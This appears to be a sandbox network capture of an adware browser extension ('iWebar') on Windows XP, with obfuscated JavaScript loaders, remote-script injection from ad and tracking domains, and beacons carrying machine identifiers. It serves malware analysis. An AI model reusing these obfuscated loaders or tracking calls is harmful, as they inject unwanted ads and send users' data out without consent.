    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: ts-crl.ws.symantec.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Server: Apache
    ETag: "3c1e6ae384827fe41b60cbb437fcd2d0:1401873093"
    Last-Modified: Wed, 04 Jun 2014 09:11:33 GMT
    Accept-Ranges: bytes
    Content-Length: 477
    Date: Wed, 04 Jun 2014 18:55:16 GMT
    Connection: keep-alive
    Content-Type: application/pkix-crl
    0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporatio
    n100...U...'Symantec Time Stamping Services CA - G2..140604090105Z..14
    0614090105Z.00.0...U.#..0..._..n\..t...}.?..L...0...U.......p0...*.H..
    ............zn..;..v.e......D.?....Ip....7..H......g.w:R..t.......`...
    Y.."...m._gIc. X q.VO$...).>\......YX<....X..s.....Y.9%.Z..!.V..
    .....f.PK*..|o..L.u....).xuv.l5\sM.:......o. <,..7..e.3L_..jBw.....
    .wl.gL.*vA...4....sQ{.m.....(*.4.U.m..3........R#..?.N...U2...j...HTTP
    /1.1 200 OK..Server: Apache..ETag: "3c1e6ae384827fe41b60cbb437fcd2d0:1
    401873093"..Last-Modified: Wed, 04 Jun 2014 09:11:33 GMT..Accept-Range
    s: bytes..Content-Length: 477..Date: Wed, 04 Jun 2014 18:55:16 GMT..Co
    nnection: keep-alive..Content-Type: application/pkix-crl..0...0.....0.
    ..*.H........0^1.0...U....US1.0...U....Symantec Corporation100...U...'
    Symantec Time Stamping Services CA - G2..140604090105Z..140614090105Z.
    00.0...U.#..0..._..n\..t...}.?..L...0...U.......p0...*.H..............
    zn..;..v.e......D.?....Ip....7..H......g.w:R..t.......`...Y.."...m._gI
    c. X q.VO$...).>\......YX<....X..s.....Y.9%.Z..!.V.......f.PK*..
    |o..L.u....).xuv.l5\sM.:......o. <,..7..e.3L_..jBw......wl.gL.*vA..
    .4....sQ{.m.....(*.4.U.m..3........R#..?.N...U2...j.....


    GET /plugin/apps/35510/manifest/1_34_05_12/ie6/manifest.xml?ver=268&rnd=6271 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401651782"
    Last-Modified: Sun, 01 Jun 2014 19:43:02 GMT
    Cache-Control: max-age=900
    Content-Length: 1663
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1401908123.dop019.am4.t,1401908124.cds002.am4.pr
    <?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>.  <V
    er>278</Ver>. <ShortName>iWebar</ShortName>. &l
    t;Description>iWebar</Description>. <PublisherName>iWe
    bar</PublisherName>. <HomePageLink>NA</HomePageLink>
    ;. <JSLink>hXXp://js.datademoserv.com/plugin/apps/35510/js/na/i
    e/app_code.js</JSLink>. <GroupID>0</GroupID>. <
    Domain>NA</Domain>. <RunInIframe>false</RunInIframe
    >. <ThanksURL>NA</ThanksURL>. <EmailSignature>N
    A</EmailSignature>. <SettingsURL>NA</SettingsURL>.
    <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites
    >NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiU
    RL>. <DisableIE>true</DisableIE>. <DisableFF>tr
    ue</DisableFF>. <EnableSearchIE>false</EnableSearchIE&
    gt;. <EnableSearchFF>false</EnableSearchFF>. <Address
    barIE>NA</AddressbarIE>. <AddressbarFF>NA</Addressb
    arFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>
    . <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA&l
    t;/NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <Ope
    nSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js
    .datademoserv.com/plugin/apps/35510/bg/na/ie/bg_code.js</Background
    JS>. <BackgroundVer>1</BackgroundVer>. <Manifest&g
    t;NA</Manifest>. <ChangePrevious>false</ChangePrev

    <<< skipped >>>

    GET /plugins/mins/monetization/geo/price_gong_m.js?ver=3&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:25 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401904989"
    Last-Modified: Wed, 04 Jun 2014 18:03:09 GMT
    Cache-Control: max-age=632
    Content-Length: 1055
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908125.dop019.am4.t,1401908125.cds064.am4.c
    if (typeof setup2 === 'function') { setup2('MDI2ODY2NTQwMzEyMTYxZTM3MD
    ExNTQwNTU1NjQ5MGUxNjFhMTI0OTU2NGQwNjE4MTgxMjRjMWQwYTFjMDkxMjA2MTgwYzA3
    MTYwYjRjMWExNzA0MDA1OTAxMTU0ZDFkMDUyYzFiMDU0MTFjMTg1OTIzMjgyNDNhMzUyYj
    JlMjIyZTM5MmIyYTVmMTAwYjExMWQxMjE5NDAzMTNiMjAyYzNkMmIzYzIyMzkyZjIwM2Iz
    NjM2MmIzZDI2MzI1NjM5M2QyZDMwM2MyYTMxM2QzZjJmMjMzMDMxMzEyNjNiM2QyNjMyMz
    QzOTQ0MmMzMDMyMzcyNjMwMzIyMjM1MzIyMjIzMmEyNjJjMmUzYjJlNWIzZDMxMjEyMTM2
    MzEzYzI0MjIyMjI3M2MzZDMyMjkzMjMwMzgyYTJiMjczMTNkNTE1NTY4NjY1NDAzMTIxNj
    FlMTEyNjBiMGU0ZDRjNGI0NDBhMWExNjAzMGE1ODQwNTkwMjA4MTExYTRjMDAxMTBkMWYw
    NjAyMDgwNTBmMTYxNjU3MGIwMTEwMDQ0OTA4MWQ0ZDAwMWUzZDBkMTE0NTBjMTE1MTIzMz
    UzZjJiMjMzZjJhMzIyNzMxMmIzNzQ0MDExZDA1MTkwMjEwNDgzMTI2M2IzZDJiM2YzODMy
    MzAyNzIwMjYyZDI3M2QyOTIyMjI1ZjMxM2QzMDJiMmQzYzI1MzkyZjI2MmIzMDJjMmEzNz
    JkMjkyMjIyM2QzMTQ0MzEyYjIzMjEzMjM0MjIyYjNkMzIzZjM4M2IzMDM4MmEyYjI3NTMz
    ZDJjM2EzMDIwMjUzODM0MmIyYTI3MjEyNjIzM2YyNjM0MjgyMzIzMjcyYzI2NDA0MzdjNj
    I0NDEyMDIxNzE0MTAwYzI2MTI0OTVjNDI1YzU2NDE1NTY4NGY1NjRiNDY0MDE4MDcwMTBk
    MGIwYzE3MDc0NDU4NGUzOTUxMGEwYTAwMDYxYjBmMGMwOTQwMmU3MzFm', 'ybovkfbnbs
    '); }
    ....



    GET /plugins/mins/monetization/geo/similar_products_m.js?ver=20&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:25 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401281973"
    Last-Modified: Wed, 28 May 2014 12:59:33 GMT
    Cache-Control: max-age=265
    Content-Length: 106250
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908125.dop019.am4.t,1401908125.cds020.am4.c
    appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
    f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
    monetization.plugins={};}appAPI.internal.monetization.plugins[217]=fun
    ction(){var a=(function(f){String.prototype.replaceAll=function(i,h){r
    eturn this.split(i).join(h);};var e=f(window);f.fn.visible=function(h,
    C,H){if(this.length<1){return;}var D=this.length>1?this.eq(0):th
    is,v=D.get(0),w=e.width(),l=e.height(),H=(H)?H:"both",m=C===true?v.off
    setWidth*v.offsetHeight:true;if(typeof v.getBoundingClientRect==="func
    tion"){var q=v.getBoundingClientRect(),J=q.top>=0&&q.top<l,o=q.b
    ottom>0&&q.bottom<=l,E=q.left>=0&&q.left<w,z=q.right>0&
    &q.right<=w,i=h?J||o:J&&o,y=h?E||E:E&&z;if(H==="both"){return m&&i&
    &y;}else{if(H==="vertical"){return m&&i;}else{if(H==="horizontal"){ret
    urn m&&y;}}}}else{var x=e.scrollTop(),r=x l,G=e.scrollLeft(),I=G w,n=D
    .offset(),A=n.top,B=A D.height(),F=n.left,u=F D.width(),j=h===true?B:A
    ,k=h===true?A:B,s=h===true?u:F,p=h===true?F:u;if(H==="both"){return !!
    m&&((k<=r)&&(j>=x))&&((p<=I)&&(s>=G));}else{if(H==="vertic
    al"){return !!m&&((k<=r)&&(j>=x));}else{if(H==="horizontal"){ret
    urn !!m&&((p<=I)&&(s>=G));}}}}};var d=(function(m){if(!Array.pro
    totype.indexOf){Array.prototype.indexOf=function(o,p){if(this===undefi
    ned||this===null){throw new TypeError('"this" is null or not defined')
    ;}var q=this.length>>>0;p= p||0;if(Math.abs(p)===Infinity){p=
    0;}if(p<0){p =q;if(p<0){p=0;}}for(;p<q;p ){if(this[p]===

    <<< skipped >>>

    GET /plugins/mins/monetization/geo/superfish_no_coupons_m.js?ver=12&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:26 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401904989"
    Last-Modified: Wed, 04 Jun 2014 18:03:09 GMT
    Cache-Control: max-age=354
    Content-Length: 759
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908125.dop019.am4.t,1401908126.cds020.am4.c
    if (typeof setup2 === 'function') { setup2('MDM2OTY3NTAxZDAzMGUwYTNkMT
    YxNDQxNTQ1MjU3MWYwZTBlMTg1ZTU3NGMxOTA1MDI1OTA5MGYxODAxMGEwNTA3MDExZDU5
    MTkxNTA1NGIwZjEwNDEwMTEzMjgxNzFiMDEwYTU2MDkxZDAyNGExMzE2MDkwNzExMGEwMD
    BiNGYxZDFmMGMwMDA1MGQxMzE0NDgwNzA2MTIwODMzMGM1OTE5MDEwZDU0MzYyMzMzM2U1
    NTNiMjcyMDNjM2QyNjI0MjgzMzJjMjEyYTNjMmIyYTIxMzIzNDNlMmQyMDI3MzAzYjMwMm
    EzZTNlMjUzNzQ2NTQ2OTY3NTAxZDAzMGUwYTFiMzEwYTBmNGM0ODU1NTUxMjBlMWMxNDBi
    NTk0MTVkMDIwMDBkNTQxYjExMDgwNjFjMTQxYzA0MTI1NDBiMGIxNTRjMTkwMTVhMDQxYz
    I1MDUwNTExMGQ0MDE4MDYwNzQ1MWUwNDE3MTcxNjFjMTExMDRhMTIxMjFlMWUxNTBhMDUw
    NTUzMDIwOTFmMWEyZDFjNWUwZjEwMTY1MTM5MmUyMTIwNDUzYzMxMzEyNzM4MjkyOTNhMm
    QzYzI2M2MyZDMwMmYyZTNmMjYyMDNkMjczMTIxMjAzNTI1MzMyYzNiMjc0MTQyNzg3YzU1
    MGExNjFkMDMxMTBkMjcxNjU3NGQ1YTQzNWI2ZTA1', 'xcnruwzzhd'); }
    ....



    GET /plugins/mins/monetization/setup.js?ver=12&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:25 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401299688"
    Last-Modified: Wed, 28 May 2014 17:54:48 GMT
    Cache-Control: max-age=761
    Content-Length: 6298
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908125.dop019.am4.t,1401908125.cds046.am4.c
    var _0x25da=["\x73\x74\x72\x69\x6E\x67","\x6C\x65\x6E\x67\x74\x68","\x
    63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x72\x65\x70\x6C\x61\x63\x65"
    ,"\x6D\x61\x74\x63\x68","\x6D\x61\x70","\x61\x70\x70\x6C\x79","\x66\x7
    2\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x75\x74\x69\x6C\x73","\x4
    2\x61\x73\x65\x36\x34","\x64\x65\x63\x6F\x64\x65","\x63\x61\x6C\x6C","
    \x70\x61\x72\x73\x65","\x4A\x53\x4F\x4E","\x6D\x6F\x6E\x65\x74\x69\x7A
    \x61\x74\x69\x6F\x6E","\x69\x6E\x74\x65\x72\x6E\x61\x6C","\x70\x6C\x75
    \x67\x69\x6E\x73","\x75\x6E","\x64\x65\x66","\x69\x6E\x65\x64","\x70\x
    6C\x75\x67\x69\x6E\x49\x64","\x67\x65\x74\x45\x78\x74\x65\x6E\x64\x65\
    x64\x53\x75\x62\x49\x64","\x66\x75\x6E\x63\x74\x69\x6F\x6E","\x73\x6C\
    x69\x63\x65","\x67\x65\x74\x53\x75\x62\x49\x64","\x67\x65\x74\x54\x69\
    x6D\x65","\x68\x74\x74\x70\x55\x72\x6C","\x5F\x5F\x52\x4E\x44\x5F\x5F"
    ,"\x67","\x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x45\x58\
    x54\x45\x4E\x44\x45\x44\x5F\x53\x55\x42\x5F\x49\x44\x5F\x5F","\x5F\x5F
    \x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x55\x53\x45\x52\x5F\x49\x
    44\x5F\x5F","\x75\x73\x65\x72\x49\x64","\x61\x70\x70\x49\x6E\x66\x6F",
    "\x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x49\x4E\x53\x54\
    x41\x4C\x4C\x45\x52\x5F\x55\x53\x45\x52\x5F\x49\x44\x5F\x5F","\x67\x65
    \x74\x55\x73\x65\x72\x49\x64","\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72","
    \x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x41\x50\x50\x5F\x
    49\x44\x5F\x5F","\x61\x70\x70\x49\x44","\x5F\x5F\x43\x52\x4F\x53\x53\x
    52\x49\x44\x45\x52\x5F\x42\x52\x4F\x57\x53\x45\x52\x5F\x5F","\x74\

    <<< skipped >>>

    GET /apps.gif?action=update&app=35510&bic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&ver=1_34_05_12&installtime=1401908096&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000169&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&appver=278&bgver=1&pluginsver=137&curtime=1401908122&lifetime=26&oldappver=268&oldbgver=1&oldpluginsver=133&rnd=7666 HTTP/1.1
    Accept: */*
    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: pzCpKSe4lpl7pUMjbhDAZS5WNLs3VA7plXK3vtu ELP2WyUgZzmBwKEaDVsIFun7wklZltRUd3s=
    x-amz-request-id: C5F5FBA6840C8CED
    Date: Wed, 04 Jun 2014 18:55:28 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:54 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    GET /plugins/javascripts/monetization/geo/adextent_m.js?ver=1&rnd=41 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:25 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1398175363"
    Last-Modified: Tue, 22 Apr 2014 14:02:43 GMT
    Cache-Control: max-age=672
    Content-Length: 431
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908125.dop012.am4.t,1401908125.cds066.am4.c
    appAPI.internal.monetization = appAPI.internal.monetization || {};.if 
    (typeof appAPI.internal.monetization.plugins === "undefined") { appAPI
    .internal.monetization.plugins = {}; }..appAPI.internal.monetization.p
    lugins[257] = function() {...appAPI.internal.monetization.addRemoteJS(
    {...httpsUrl: "hXXps://dyau9xqp8gzji.cloudfront.net/autotag.js",...htt
    pUrl: "hXXps://dyau9xqp8gzji.cloudfront.net/autotag.js",...pluginId: 2
    57..});..};
    ....



    GET /plugins/mins/monetization/geo/dealply_m.js?ver=8&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:25 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401904989"
    Last-Modified: Wed, 04 Jun 2014 18:03:09 GMT
    Cache-Control: max-age=859
    Content-Length: 1023
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908125.dop012.am4.t,1401908125.cds029.am4.c
    if (typeof setup2 === 'function') { setup2('MWU2NDQyNTQ0NDU0NTYwZTEyMT
    cxNTNiMTAxODQ2NGU1NDQ0MGUxNzExMWU1ODViNGIxZDVhMDUxNDA3MTcwNDExNWEwZDFh
    MTIwOTQ5MDAxNzBhMTA1YjBlMTUwMjA3MTUwMDE3MDcxMjAwNGExZTA3NTkwNTBiMDQwMD
    BjMTEwODQ5MTcxNDAyMTEzYTMxM2QzNzM2M2IyNzM1MzQyYTIxMmIzMDJiMjEyYzIwMjMy
    ODI3MjAyYTNkMjczMTM2MmIyZjIyM2MzYTQ4MDMwNDE0MjAxZDEyMGEwNjU4MzEzZDM3Mz
    YzYjI3MzUzNDJhMjEyYjMwMmIyNTI0MjQzOTI4MjIyODJiM2QyYjQyMWMxZDAyNWIzYzNh
    MmQzMDNiMzcyNzI2MmYyMjI2MzczMTM3MjcyMTI2MmIyZjIyM2MzYTRjNGU3ZTQ0NTQ1ND
    Q2NDQwYjExMWExMjA3MzEwNjE4NDQ1YzQzNDcwNjE2MDAxNDA3NGU0OTQ5MGEzYTBkMTAx
    MDE2MWUwNzM5MGYwZDAzMDE0YzAwMDgwNzE3MDIwODRkMDYwMTBmNWIwNzA2MTAxNDQ5MD
    kwNDE4MDMwNzA3MDYxZDE2MTI0ZDBmMWQ1ZDE3MGMxNTFhMDgwMzBmNTgwZDEwMTAxNjJi
    MmIzOTI1MzEyYTNkMzEyNjJkMzAzMTM0MzkyNjNkM2EyNzNhMjAzMTMwMzkzNTM2MjczMT
    JiMzAzYjJiNTIwNzE2MTMzMTA3MTYxODAxNDkyYjM5MjUzMTJhM2QzMTI2MmQzMDMxMzQz
    OTIyMzUzZTNkM2EyNTM5MzEzOTM5NDUwZDA3MDY0OTNiMmIzNzM0MjkzMDM2M2MyYjMwMj
    EyNjJiMzMzNTI2MzczMTJiMzAzYjJiNTY0YTZjNDM0NTRlNDI1NjE0MTgwMTAxMGYwZDJj
    MGE0MDRlNDQ0NTQ0NTQ2YzFl', 'enbtdttffc'); }
    ....



    GET /plugins/mins/stats/ie.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:25 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401904979"
    Last-Modified: Wed, 04 Jun 2014 18:02:59 GMT
    Cache-Control: max-age=477
    Content-Length: 491
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908125.dop012.am4.t,1401908125.cds054.am4.c
    if (typeof setup2 === 'function') { setup2('MWY3ODYxNGExYzFhMTMxMzM5MT
    kwODUwNTI0ODU2MDYxMzE3MWM1MTRiNWQxODEwNWEwMzFlMDIwZjFmMGQwNDBkMWIwMDBm
    MTMxMDQyMDgwYjFmNDcwOTE3MWEwZTE1MDk0NDBkMTc0NjAyMDc1MTE1MGQwODU2M2IyZD
    NhMjYzMDMxMzg0MTQwNjE2ZDUwMDAxYzAwMWUxNDM2MWUwNzQ2NDg0ODRhMWMxYTEzMTMx
    ZjUxNGI1ZDBhNWIxYTU2MDk1MDAyNTk0YTAxMWIwNDVhMDYxMDAwMDgwNTRhMWMwZDFjNW
    IwZjA0MTcwNTFkMDE1ZDAxMGQ1YTA0MTQ1YzFlMDUwMDRmMzczNzI2MjAyMzNjMzM0OTQ4
    Nzg2MTRhMDQwMjEyMDQwNTA1MmQxNjRhNTI1NDVjNTE1YTY2MTY=', 'drhhtngclk');
    }
    ....



    GET /plugins/mins/monetization/monetizationLoader.js?ver=51&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:26 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401728669"
    Last-Modified: Mon, 02 Jun 2014 17:04:29 GMT
    Cache-Control: max-age=755
    Content-Length: 156130
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908126.dop012.am4.t,1401908126.cds020.am4.c
    (function(t){var v="06-01";if(!appAPI.isBackground&&appAPI.dom&&appAPI
    .dom.isIframe()){return;}var F=appAPI.utils.MD5;if(!F||!F.encode){F={}
    ;F.encode=function(M){return M;};}if(typeof appAPI.internal.monetizati
    on==="undefined"){appAPI.internal.monetization={};}var J=appAPI.utils;
    var w={DBNamespace:"monetization_plugin_",RULS_JSON_NAMESPACE:" rules_
    ",MONETIZATION_PLUGINS_IDS:"monetization_plugins_ids",IS_INSTALL_REPOR
    TED:"is_install_reported_",STATS_NAMESPACE:"stats_",PLUGINS_VERSION:"p
    lugins_version_",GEO_URL:"hXXp://ipgeoapi.com/",BASE_DATE:new Date(201
    3,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:"hXXp://app.datade
    moserv.com/monetization_campaigns/",statsHostUrl:"hXXp://logs.datademo
    serv.com/monetization.gif?",errorHostUrl:"hXXp://errors.datademoserv.c
    om/monetization-error.gif?",countryName:"",reportQueryString:"",subID:
    "000000000000000000",reportEvents:{installEventId:0,dailyEventId:1,ver
    tical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newA
    llowedVertical:32,policyAppDefualtInstallEventId:50,policyAppDefualtDa
    ilyEventId:51},MIN_PAGE_VIEW:(appAPI&&appAPI.internal&&appAPI.internal
    .isNova?-1:50),MAX_IMPRESSIONS_TO_SEND_IN_PING:200,MAX_PAGE_VIEWS_TO_I
    NJECT_BI_PIXEL:200,PAGE_VIEW:"monetization_page_view",pageViewCount:0,
    PLUGINS_DELAY:"monetization_plugins_delay",installationTime:appAPI.ins
    taller.getUnixTime()*1000,hoursToMilisec:60*60*1000,DEFUALT_SOURCE_ID:
    0,categories:{"1":["d908e50170d7cb46a92fdbff0d73bb5d","0a64c81275732dc
    f0eb51fc0fdecfaa7","edb18644366c10cc24c58f6fb14ca9f4","15e39ed909a

    <<< skipped >>>

    GET /omaha/DD1B4183-F36A-4489-9A68-4205A6801149/1/ping.xml?rand=24814 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: update.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:33 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1400143354"
    Last-Modified: Thu, 15 May 2014 08:42:34 GMT
    Cache-Control: max-age=13199
    Content-Length: 229
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1401908133.dop009.am4.t,1401908133.cds051.am4.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">. <daystart elapsed_seconds="56754"/>. <
    ;app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.
    .<event status="ok"/>. </app>.</response>...


    GET /monetization.gif?event=4&ibic=7F1D95218D1E4CF487AAD4B2A3E48467IE&verifier=1121c510e5f38d154df47b19458d540e&campaign=000046&app=32850&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908094&iep=1&chp=na&ffp=na&browser=ie,de HTTP/1.1
    Host: logs.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:34 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1344239556"
    Last-Modified: Mon, 06 Aug 2012 07:52:36 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1401908134.dop018.am4.t,1401908134.cds019.am4.c
    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Wed, 04 Jun 
    2014 18:55:34 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
    live..Accept-Ranges: bytes..ETag: "1344239556"..Last-Modified: Mon, 06
    Aug 2012 07:52:36 GMT..Cache-Control: max-age=86400..Content-Length:
    35..Content-Type: image/gif..X-HW: 1401908134.dop018.am4.t,1401908134.
    cds019.am4.c..GIF89a.............,...........D..;..


    POST /br.ashx?pid=%s&aid=%s&ss=0&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&md5=3b456ea93c832f8b2dadec75b7f745f8&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=F86D41BF-D1A5-4690-A216-28E5FBCF949C HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)
    Host: searchsh.goobzo.com
    Content-Length: 2522
    Connection: Keep-Alive
    Cache-Control: no-cache

    d=noFdkfdc/3Ym7WfeGKPBoA/WcAPU9MuHMR/N7u85ntBjmnbmQc1N6BJsmumK4FTgKKVgWXNYdfHiO7jXdZ2PpxGiiJm1aHQ2Zu32fzAMlNMwA0apBzp//1xuMYKK3fvP6tjr7JyfnncoU1lVKMQD8ptMRzqRsUgFyuTtIqGuS2eDBG7EbBs53HhMadd03uJ1bPd /FEXUnF/0G8eZWnfchnn1GY51VblI9d0toWUgrwjA1s K6oMhb5sn22bOXV49rYd3WUvDUDQedoyzf1BTWqkl/5qXfJvXtdvxVf5bhD OlniETKMGeEi1cTL7MbcVPMI0IyZTzEjguXm4Ysw jheFNyj63yVBFKt5r4FvM rugpeluYX1hI6kmyF5QSJG/yXQAObw9dQ/CpougsrKeNA552OdVhZXEzR8IPCQWDke3oJD7yNAqbbsrEGJv0Z8aotympKJgxO3Dsz9VK3lZX9/83T93C7VhTXiFAP2LpLVEpsBQW97KmW/4U1c5xjAd4FxR83eUE8 BBm6cCfFWuYIEsBeWSSAZ2YoagGq9TfYzsEXQDbaRzoWeK082JOnneq8tQ1bQSD Wgu5NSpIyEYTiO8xgUQTl4JMATcfoLsvbstlOOacYLhtiqNroLAvs9OdXVQKqfgDvWseiqL AZuusFW2JJvOrKj7tHMfhcJ9jMzwXkcj8zTpe doxOK9V7hCRINfuhhnlLqbUbuhkOfI0Xm3XS7EWhkmmEhEa77PRqVwlz6JNC/Lfr2NDOnfQSBFPtVxWUWakHS94NZ/8DFJo4MlHvutd3rVROZN48JP7hZeC0eIuExvz37y1p369Bdabh09OQbhcZ3RWxRPqikbWP2d/VDoL/1wO90IW9JWNeLzJhkNEHQvbF3lHCQnxigWdTQp7ebbAfgKFR3vwgiS8SEZgTXu4EAVET4ahqkRJ3bri30825 ZSdBd41MuuVqxqFh/7wAnN4KZzt8HmRo3tN00NVI1xu9TOSjFhnE6LjY1uRLAktwuXyzLyhurwWvSMHLbsd8GIIQYvXF31kUBKvbkq4VxDbj1iy6L8Ywg/RH90xmF5FMjvVusnt/z
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 0
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:05 GMT


    GET /wu.ashx?dsid=1&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)
    Host: searchsh.goobzo.com
    Pragma: no-cache


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 1720
    Content-Type: text/html; charset=utf-8
